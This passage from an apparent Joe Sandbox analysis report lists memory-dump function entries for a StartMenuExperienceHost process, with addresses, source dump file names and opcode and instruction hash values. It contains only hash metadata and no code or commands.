              • Opcode Fuzzy Hash: c2d93a9485277f6ac80b9bfc9c9127c91824f20c19e533c6046b1447517a4d74
              • Instruction Fuzzy Hash: 4F21E9B0E0461ECEEB60DB14CCA57F97AB0EF56304F5081FAD50DE2291DA782A84DF81
              Function 00007FFD34787201 Relevance: .1, Instructions: 65COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 985b2d0b47d2e48a698df85bcf1f727c61a264792ffcffd573f1998dd0028f77
              • Instruction ID: 9f409502c54031f866d55dfe1c42a8c675e71bcd075182657e41426c0a43e561
              • Opcode Fuzzy Hash: 985b2d0b47d2e48a698df85bcf1f727c61a264792ffcffd573f1998dd0028f77
              • Instruction Fuzzy Hash: EF11B470A0860ACFDBD8EF6884AA2BE77B0FF19301F00457BD40AD2192DA38A140C780
              Function 00007FFD347872A5 Relevance: .1, Instructions: 64COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3e7a4e88133e5177c552d8d765b6ca8eb0d69a7b9efc6c7b993a7ec97acfac69
              • Instruction ID: 4bb2cac8bf61ed44e7f9bf192a2cc0354c4da53ae9e590b66edcaa9cc812186d
              • Opcode Fuzzy Hash: 3e7a4e88133e5177c552d8d765b6ca8eb0d69a7b9efc6c7b993a7ec97acfac69
              • Instruction Fuzzy Hash: A8118771A0864ECFDB95EF6888AA2FD7BF0FF59302F00457ED40AD2592DA39A444C781
              Function 00007FFD34784BB5 Relevance: .1, Instructions: 64COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad1d324fa4b13599abc4a9eefb7233ad8f2b74a0b2d5cc5cb8151894bf0a221d
              • Instruction ID: 61f9fbff8c6764748b01351a1d3ff7c0f3c1b0afd5361f3a35cae4e0a38aefee
              • Opcode Fuzzy Hash: ad1d324fa4b13599abc4a9eefb7233ad8f2b74a0b2d5cc5cb8151894bf0a221d
              • Instruction Fuzzy Hash: 7D117571E0854E8FDB99DF6884AA2BD7BE0FF69306F0005BED409D2192DA79A444C780
              Function 00007FFD34784B19 Relevance: .1, Instructions: 62COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e0027c5f1d635ebd5785be54ab9c342b860379410bcdfd94b099b20eb40f348a
              • Instruction ID: 55fae7ecd355ad01a3b70a84dcbe7e0cc1c9eadc0a36693b178c19378ab74645
              • Opcode Fuzzy Hash: e0027c5f1d635ebd5785be54ab9c342b860379410bcdfd94b099b20eb40f348a
              • Instruction Fuzzy Hash: 7611B77090864ECFDB99DF68886A2BD7BA1FF59301F41017BD40DC3192DB78A540C780
              Function 00007FFD347850D5 Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 298247738a9067b785fdd690e5825409ae992c66d83d10da173b40ed7a2e3493
              • Instruction ID: a09b01b8b643a35dd39a420e76a467aa7ef62314691c104e2b7ca28c282f0027
              • Opcode Fuzzy Hash: 298247738a9067b785fdd690e5825409ae992c66d83d10da173b40ed7a2e3493
              • Instruction Fuzzy Hash: BD11C1B1E0DA898BEBD9DF6488B62B87BA1FF16309F0500BED50DD2192DE296454C781
              Function 00007FFD3477085D Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32d3c55652c9c34174714960e1f8c83b4de2b3a18a0de2242ceabeb84e0c1c16
              • Instruction ID: 8a5b57583eebcf4eada1edb2260ac4fda972d450f60463885537427cd41e6cb4
              • Opcode Fuzzy Hash: 32d3c55652c9c34174714960e1f8c83b4de2b3a18a0de2242ceabeb84e0c1c16
              • Instruction Fuzzy Hash: 3C01F561B1C68ADEE751EBB888A81B93BE0EF5B300F9184B2C148C6093ED7CF455C2D0
              Function 00007FFD347854E9 Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5636d2448043f3343f11e6176803abb48d5aa551f3498b4f5187c7808ff8e708
              • Instruction ID: c0d253f218374fc94dbe50356c33624c8ac9c78827ed2441b860b9d81f45ef03
              • Opcode Fuzzy Hash: 5636d2448043f3343f11e6176803abb48d5aa551f3498b4f5187c7808ff8e708
              • Instruction Fuzzy Hash: 6B116371A1864A8FDB95EF64846A2BA7BF1FF1A305F4005BAD40DD6192DE386540C741
              Function 00007FFD34787991 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d5e2fc8baf0ac63e16a892fdbb0d6cf5c6e41b4c2d5bffa3e584d8101c50fcee
              • Instruction ID: 01655b6031d535a4b4df1f2795c69941c989d0198f3e0b35fd0e785012c59a31
              • Opcode Fuzzy Hash: d5e2fc8baf0ac63e16a892fdbb0d6cf5c6e41b4c2d5bffa3e584d8101c50fcee
              • Instruction Fuzzy Hash: 6D118E71A0955A8FE781EB74CC9D7AA7BF4EF1A301F0009B6D419D7092DA38A580C750
              Function 00007FFD347863D1 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 15e6142e43903ebc604e530c2d87d2eac5d329587b430b8b9c0933c08310403f
              • Instruction ID: 8107e3a2055e6e2ddb8966fbc95a431ae1af58bac01035e6cc214fed67cca9fe
              • Opcode Fuzzy Hash: 15e6142e43903ebc604e530c2d87d2eac5d329587b430b8b9c0933c08310403f
              • Instruction Fuzzy Hash: 5011E571A0854E9FE798EF2484BA2BD7BA1FF1A305F4104BEC40EC21A2DE39B550C781
              Function 00007FFD34781221 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e9e090cff7f6d417fb01dc5d104062fe2fb179da07a6965476380212b35a8987
              • Instruction ID: 1bf31276e4d9439cb03f4a3d8ab5bf6479c83fd598deb5c3c0336ff5be6d0d35
              • Opcode Fuzzy Hash: e9e090cff7f6d417fb01dc5d104062fe2fb179da07a6965476380212b35a8987
              • Instruction Fuzzy Hash: 85116DB0A0864D8FEB84EF64C4A92BD7BA0FF2A301F5145BAD51AD2192DE39A540C740
              Function 00007FFD347873DD Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7ed4c7c6e698ecd06a997207782df6dd0be614b2e70e11b0d43d29a3d8a260ec
              • Instruction ID: 1454fc7d8738344c506227efb0c9d4818ac12bc04df44a13e0658f0fa775a274
              • Opcode Fuzzy Hash: 7ed4c7c6e698ecd06a997207782df6dd0be614b2e70e11b0d43d29a3d8a260ec
              • Instruction Fuzzy Hash: F011C471A0954A8FEB98EF1488A62F97BA0EF59301F0041BED50EC2192DE797454D7C1
              Function 00007FFD34782D01 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a0dc240800c61f5e592f3e0a03b8cd534b89622aec814af13b29163dba6c9ebc
              • Instruction ID: bb8ae211900038c2f09f6cd749ecf769ee0275fa2be42e188f43491997af1aa9
              • Opcode Fuzzy Hash: a0dc240800c61f5e592f3e0a03b8cd534b89622aec814af13b29163dba6c9ebc
              • Instruction Fuzzy Hash: 6D018071A1864ACEE791EB74C4996FA7BF0FF1A302F4144B6D419C70A2EA38A145C790
              Function 00007FFD3477BFC5 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: de22b3872159610999fb51c2f5a7877689c870b7823e6b3de423e494483a9f1c
              • Instruction ID: a28a7bcc230b2edf83e31ca60066ea4ce8822648cbff4601100c8b9e224e95ad
              • Opcode Fuzzy Hash: de22b3872159610999fb51c2f5a7877689c870b7823e6b3de423e494483a9f1c
              • Instruction Fuzzy Hash: EB116170A1864D8FEB84EF64C8A92BE7BE1FF19304F5148BAD409D6192EF78A544C780
              Function 00007FFD347851FD Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 06b6995825334c9513ba3d6bcf0975aa259fcfd4e5eccf27f78e0834780b6b80
              • Instruction ID: edb3aa1a3d29e718b67fa184f95d62e9930a037b174efb65ffe3ce037b57ef61
              • Opcode Fuzzy Hash: 06b6995825334c9513ba3d6bcf0975aa259fcfd4e5eccf27f78e0834780b6b80
              • Instruction Fuzzy Hash: 121191B0A0854A8FEBD4EF6484AA2BE77E0FF19305F0005BED409D6192DE39A550C740
              Function 00007FFD34784F29 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a417ae7274270ff1eec243b29e1654d36b35cf575b2281d133afdd20e4a46c83
              • Instruction ID: 21b9027a9c0ad63311f0648786811b1def774d73af6785cad742fa501ff6ed19
              • Opcode Fuzzy Hash: a417ae7274270ff1eec243b29e1654d36b35cf575b2281d133afdd20e4a46c83
              • Instruction Fuzzy Hash: 9E11A370A1C68A8FE791EB7488A92B97BE0FF1A311F0545B7D41CC71A3EA38B540C781
              Function 00007FFD34786589 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8670fa4a89e302700d07198dda5a47ca171e6ad8286ea6d21a8f95d6203c0889
              • Instruction ID: bc129e0ee60fce8331bc374ea62cbe537e92043706007be326fba51d4bdfd1b2
              • Opcode Fuzzy Hash: 8670fa4a89e302700d07198dda5a47ca171e6ad8286ea6d21a8f95d6203c0889
              • Instruction Fuzzy Hash: B611E370A0864E9FE791EB7888AA6B97BF0FF1A301F0405B6D518D60A6EF38A540C741
              Function 00007FFD3478545D Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1c33f4795132e5898ef42e79297484a6c22d1000924b9a49f63ab694c1b3abda
              • Instruction ID: 4b7f2706ed9aa62816abd0ec5e11509120ba1a16ce2fe833b1576c29964b9f69
              • Opcode Fuzzy Hash: 1c33f4795132e5898ef42e79297484a6c22d1000924b9a49f63ab694c1b3abda
              • Instruction Fuzzy Hash: 0411A370A0864A8FEBD9EF64846A6BE77E1FF19316F4004BED40DD2592DE38A550C781
              Function 00007FFD347734E5 Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6606f28bd49e989a8f940b2e0d19bd07e0c315ff87f6a32451e3be8af9a5b7f2
              • Instruction ID: f3b0b9673e8b9ea076bc4f803e29cd0daaf48f14e654727b46c41ec093bb9316
              • Opcode Fuzzy Hash: 6606f28bd49e989a8f940b2e0d19bd07e0c315ff87f6a32451e3be8af9a5b7f2
              • Instruction Fuzzy Hash: E40161B0A1868E8FDB94EF74C8A96BE7BE0FF19300F4044BED519D6192DB78A540C740
              Function 00007FFD3477D9AD Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 13e8e2e29fc3f14f671cfe17b4eb7eeb193920cf7b94a0dcf4250de5078f439b
              • Instruction ID: c9ce25a61075421cc5824392285b48c3cec260e0ecba4b8def61ece9d58f82fa
              • Opcode Fuzzy Hash: 13e8e2e29fc3f14f671cfe17b4eb7eeb193920cf7b94a0dcf4250de5078f439b
              • Instruction Fuzzy Hash: 31118E71A1C68D8FDB94EF6488A92BD7BE0FF1A300F4144BAD50AD2192EA79A550CB40
              Function 00007FFD347705D8 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fa2db4b292de50bc6a1818d443f0795d1d3b1658e0be3d3cfe60321c839d0f48
              • Instruction ID: 38a48a11af9bc4e842622009b0c376f847d6989a6755cdaaa390974ed0349326
              • Opcode Fuzzy Hash: fa2db4b292de50bc6a1818d443f0795d1d3b1658e0be3d3cfe60321c839d0f48
              • Instruction Fuzzy Hash: 3C019270A0450DCFEB98EF64C4A56B97BA1FF5A304F50807ED40ED2291CE75B554C780
              Function 00007FFD34787EA9 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9ea7572e9b42f994eb4c94c6b2bdc6ff53230ae16a10afde621ec2a42b11a157
              • Instruction ID: 79b4b4321cf932cd2fc6f4fbbb96e210001bcb5f1b481ec665a06ed6f691455c
              • Opcode Fuzzy Hash: 9ea7572e9b42f994eb4c94c6b2bdc6ff53230ae16a10afde621ec2a42b11a157
              • Instruction Fuzzy Hash: C711CE71A096998FDB85DB3488A92FD7BF0FF1A302F4108BBD40AD61D2DB39A904D740
              Function 00007FFD34772E71 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6da6e8819993b392ea368682eed56890fbda78679ff7b400e4e592b9325dcf2a
              • Instruction ID: 5408e168427a44d7209366923171d105fd6576c9255f936f08021950bd0146a3
              • Opcode Fuzzy Hash: 6da6e8819993b392ea368682eed56890fbda78679ff7b400e4e592b9325dcf2a
              • Instruction Fuzzy Hash: FB018470A1864A8FE751EB74889C6B97BE0EF1B300F4195B6D518C61A2EB78F594C740
              Function 00007FFD34788251 Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b39a8305ece6ee020013fdc7abe69304a2eaa825554dbd4cadd18d2a71784adf
              • Instruction ID: 201f922c6818fc7ec0ce73c952ae19ccdca344f9ab58944ce47a68b4e2978d5b
              • Opcode Fuzzy Hash: b39a8305ece6ee020013fdc7abe69304a2eaa825554dbd4cadd18d2a71784adf
              • Instruction Fuzzy Hash: B701D470A58609CFDB99EF64C8A96BE37A0FF1A301F5204BEC00AC6192EE38A510C740
              Function 00007FFD3477284D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8da772eca910777b4a14c87c8b33ac73c17700bd376e4fac788cb31576587a38
              • Instruction ID: dc100b0305b7332155b078638551cdd6f1fead166712c30a3376eca17f108f7b
              • Opcode Fuzzy Hash: 8da772eca910777b4a14c87c8b33ac73c17700bd376e4fac788cb31576587a38
              • Instruction Fuzzy Hash: C401D470A1858ECFE791AB2888981B97FE0EF1A310F8586B6D518C6092EE7DF040C780
              Function 00007FFD34772EE9 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 71fbb8650b93e613d4e3c84820e28125d2f66534e560c719886c6492aaff660b
              • Instruction ID: d73c0e40b1004aef2445b721c7b3aeaa313618399d79b22225e54bda99c8a42f
              • Opcode Fuzzy Hash: 71fbb8650b93e613d4e3c84820e28125d2f66534e560c719886c6492aaff660b
              • Instruction Fuzzy Hash: 84018F70A1D6498FE742EB7488A96B97BE0EF0B300F4689F2D418CB0A3DA7CB444C751
              Function 00007FFD34787B19 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1a157dd574ff7b056665c78eef1c84160ccb46ed0c8a88132221aeb86ff3d793
              • Instruction ID: 03b1d2817de2c323d148cbf2f37691673da12ce1345a9fad71c5781e27f09d50
              • Opcode Fuzzy Hash: 1a157dd574ff7b056665c78eef1c84160ccb46ed0c8a88132221aeb86ff3d793
              • Instruction Fuzzy Hash: ED01B171A1D6898FE792AB7488AA1E97FF1EF56301F0544F6C109CB0A2EE38A444C341
              Function 00007FFD347882CD Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 510ad2e13099be6484119ef51b342a86803a415798627bbfffe248cc848083d1
              • Instruction ID: e98e0202136e47c49ab518793128c309322cb8fb906194fb986930caed4e81f8
              • Opcode Fuzzy Hash: 510ad2e13099be6484119ef51b342a86803a415798627bbfffe248cc848083d1
              • Instruction Fuzzy Hash: 4501F230A49249CFDB99EF64C4E92FE3BA0FF0A301F0114BED41AC6592DE39A554C780
              Function 00007FFD34770608 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 800562229cec6145f29fc67a960c64d029addfea568d6f5329a9a4caced4e3a7
              • Instruction ID: 4cef8e030627cccb8470396301aa5c2de9c78b2c9b52258fb404a5ac2b111e43
              • Opcode Fuzzy Hash: 800562229cec6145f29fc67a960c64d029addfea568d6f5329a9a4caced4e3a7
              • Instruction Fuzzy Hash: 9201D170A1450ECFEB98EB64C8A82BA37A4FF1A305F90887ED51ED21D1DE79B050C680
              Function 00007FFD34770610 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d088e264ba1794d49b050e02f8721f592c4eaea999c8a6cbcfa9b904b57b93f
              • Instruction ID: 80d6c74dad3dd560155680c260b8c78db1903b5c5d4c3e089def3d8e5425b8a1
              • Opcode Fuzzy Hash: 1d088e264ba1794d49b050e02f8721f592c4eaea999c8a6cbcfa9b904b57b93f
              • Instruction Fuzzy Hash: 11016D70A1890ECAEB58EB6488A82B977A0FF1A305F50887ED41ED21D1DF7AB550D680
              Function 00007FFD34771C7D Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0ce9094660160381398108b5974882b9d2cdb000207b25fac72911173860b5b2
              • Instruction ID: 0ef52f64f8eadecb1c6e1c121e74b62e04a81927c5a27138b94ad327b79dd881
              • Opcode Fuzzy Hash: 0ce9094660160381398108b5974882b9d2cdb000207b25fac72911173860b5b2
              • Instruction Fuzzy Hash: CAF0A470A0964E8FEB94DF24C8A52BA3BA0FF56304F80417AD80CC2292DB79E554D780
              Function 00007FFD3477CCD8 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f4e8219e755bb39a31750abc2188971ff5d035e2e082b1a62d71f4e74bd2e3fe
              • Instruction ID: ac0f5b8789d472bb0678553e31bff10e5ff637a0f7bef76d5edeb519005ba578
              • Opcode Fuzzy Hash: f4e8219e755bb39a31750abc2188971ff5d035e2e082b1a62d71f4e74bd2e3fe
              • Instruction Fuzzy Hash: 6CF0867090964ACFEB549F64C8A91F93FE0FF0A314F40497AE918C2051DBB85561D780
              Function 00007FFD3477AE7B Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b71115db42333e392c4b70cde8afef85502c80ffb39c8e0b6796ebfbeacb94bc
              • Instruction ID: ac1bc90c97dd83f338b37dc495fbaf86ef317c4adec960a3489529a61ba5e7c4
              • Opcode Fuzzy Hash: b71115db42333e392c4b70cde8afef85502c80ffb39c8e0b6796ebfbeacb94bc
              • Instruction Fuzzy Hash: B5F0A471A1C60DDEFB51EB3488DA5FD7BD0EF1A300F408871D508C2052EEB8B0549681
              Function 00007FFD34772769 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 37d27e8b891576319aa9c7ecb3e9c7d4036a106a446e683a6ee49fd95ed3c01e
              • Instruction ID: 5b803ac11d9aabc30c27f4d8622695e83e30d09d994a7db27dc7c0deae7cc883
              • Opcode Fuzzy Hash: 37d27e8b891576319aa9c7ecb3e9c7d4036a106a446e683a6ee49fd95ed3c01e
              • Instruction Fuzzy Hash: BAF0CD3090D3898FEB599F2488A92B93FB4BF06200F8548FAD619C61D2DA7CA454C791
              Function 00007FFD34781240 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
